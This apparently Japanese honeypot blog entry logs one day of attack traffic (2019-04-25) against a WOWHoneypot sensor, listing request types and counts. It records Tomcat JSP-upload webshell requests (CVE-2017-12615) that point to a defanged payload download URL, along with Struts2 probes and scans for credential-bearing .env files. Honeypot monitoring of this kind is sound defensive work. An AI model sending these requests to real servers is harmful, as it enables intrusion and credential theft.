23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(40日目)

2019/04/25(木)

トータルは2745件でした。

件数 概要 リクエス
2573 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
35 アクセス GET /
13 不正中継の調査 GET hxxp://checkip.dyndns.com/
5 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
2 環境設定の調査 POST /user.php
2 環境設定の調査 GET /site/.env
2 環境設定の調査 GET /dev/.env
2 環境設定の調査 GET /config/.env
2 環境設定の調査 GET /app/.env
2 環境設定の調査 GET /api/.env
2 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob.se/download.exe
2 環境設定の調査 GET /.env
1 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) PUT /FxCodeShell.jsp::$DATA
1 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) PUT /FxCodeShell.jsp/
1 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) PUT /FxCodeShell.jsp%20
1 Zabbixの調査 POST /zabbix/index.php
1 Tomcatの任意のJSPファイルアップロードの脆弱性を狙った通信(CVE-2017-12615~12617) HEAD /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob.se/download.exe
1 不正中継の調査 GET hxxp://www.ceek.jp/?rands=_1980134368210236415061800
1 不正中継の調査 GET hxxp://www.ceek.jp/?rands=_14658606404214251438276
1 不正中継の調査 GET hxxp://www.baidu.com/?rands=_647691291210549351775520
1 不正中継の調査 GET hxxp://www.baidu.com/?rands=_127176272127146481742720
1 環境設定の調査 GET /wx/.env
1 環境設定の調査 GET /www3/.env
1 環境設定の調査 GET /www2/.env
1 環境設定の調査 GET /www/.env
1 環境設定の調査 GET /ww4/.env
1 環境設定の調査 GET /ww3/.env
1 環境設定の調査 GET /wiki/.env
1 環境設定の調査 GET /web/.env
1 環境設定の調査 GET /wallet/.env
1 環境設定の調査 GET /vpn/.env
1 環境設定の調査 GET /video/.env
1 環境設定の調査 GET /tv/.env
1 環境設定の調査 GET /travel/.env
1 環境設定の調査 GET /test/.env
1 環境設定の調査 GET /tech/.env
1 環境設定の調査 GET /support/.env
1 Apache Struts2脆弱性S2-045(CVE-2017-5638)を狙った通信 GET /struts2-rest-showcase/orders.xhtml
1 環境設定の調査 GET /store/.env
1 環境設定の調査 GET /status/.env
1 環境設定の調査 GET /stats/.env
1 環境設定の調査 GET /static/.env
1 環境設定の調査 GET /staging/.env
1 環境設定の調査 GET /stage/.env
1 環境設定の調査 GET /srv/.env
1 環境設定の調査 GET /shop/.env
1 環境設定の調査 GET /server/.env
1 環境設定の調査 GET /sch/.env
1 環境設定の調査 GET /sales/.env
1 環境設定の調査 GET /ru/.env
1 環境設定の調査 GET /pt/.env
1 環境設定の調査 GET /projects/.env
1 環境設定の調査 GET /pro/.env
1 環境設定の調査 GET /portal/.env
1 環境設定の調査 GET /pay/.env
1 環境設定の調査 GET /panel/.env
1 環境設定の調査 GET /online/.env
1 環境設定の調査 GET /old/.env
1 環境設定の調査 GET /news/.env
1 環境設定の調査 GET /new/.env
1 環境設定の調査 GET /net/.env
1 環境設定の調査 GET /my/.env
1 環境設定の調査 GET /music/.env
1 環境設定の調査 GET /mobile/.env
1 環境設定の調査 GET /members/.env
1 環境設定の調査 GET /media/.env
1 環境設定の調査 GET /mail/.env
1 環境設定の調査 GET /m/.env
1 環境設定の調査 GET /login/.env
1 環境設定の調査 GET /live/.env
1 環境設定の調査 GET /laravel/.env
1 環境設定の調査 GET /jobs/.env
1 環境設定の調査 GET /jenkins/.env
1 環境設定の調査 GET /intranet/.env
1 環境設定の調査 GET /info/.env
1 Apache Struts2脆弱性S2-045(CVE-2017-5638)を狙った通信 GET /index.do
1 Apache Struts2脆弱性S2-045(CVE-2017-5638)を狙った通信 GET /index.action
1 環境設定の調査 GET /in/.env
1 環境設定の調査 GET /img/.env
1 環境設定の調査 GET /id/.env
1 環境設定の調査 GET /help/.env
1 環境設定の調査 GET /guarapuava/.env
1 環境設定の調査 GET /google/.env
1 環境設定の調査 GET /go/.env
1 環境設定の調査 GET /gbs2u/.env
1 環境設定の調査 GET /game/.env
1 環境設定の調査 GET /ftp/.env
1 環境設定の調査 GET /food/.env
1 環境設定の調査 GET /files/.env
1 環境設定の調査 GET /fileoffice/.env
1 環境設定の調査 GET /erp/.env
1 環境設定の調査 GET /email/.env
1 環境設定の調査 GET /edu/.env
1 環境設定の調査 GET /developer/.env
1 環境設定の調査 GET /demo/.env
1 環境設定の調査 GET /db/.env
1 環境設定の調査 GET /data/.env
1 環境設定の調査 GET /dashboard/.env
1 環境設定の調査 GET /crm/.env
1 環境設定の調査 GET /cn/.env
1 環境設定の調査 GET /cms/.env
1 環境設定の調査 GET /cms-dev/.env
1 環境設定の調査 GET /cloud/.env
1 環境設定の調査 GET /client/.env
1 環境設定の調査 GET /blog/.env
1 環境設定の調査 GET /beta/.env
1 環境設定の調査 GET /assets/.env
1 環境設定の調査 GET /art/.env
1 環境設定の調査 GET /apps/.env
1 環境設定の調査 GET /analytics/.env
1 環境設定の調査 GET /amp/.env
1 環境設定の調査 GET /ae/.env
1 FreePBXの調査 GET /admin/assets/js/views/login.js
1 環境設定の調査 GET /admin/.env
1 不正中継の調査 CONNECT www.google.com:443

アイルランドのIPから環境設定の調査と思われる通信が沢山来てました。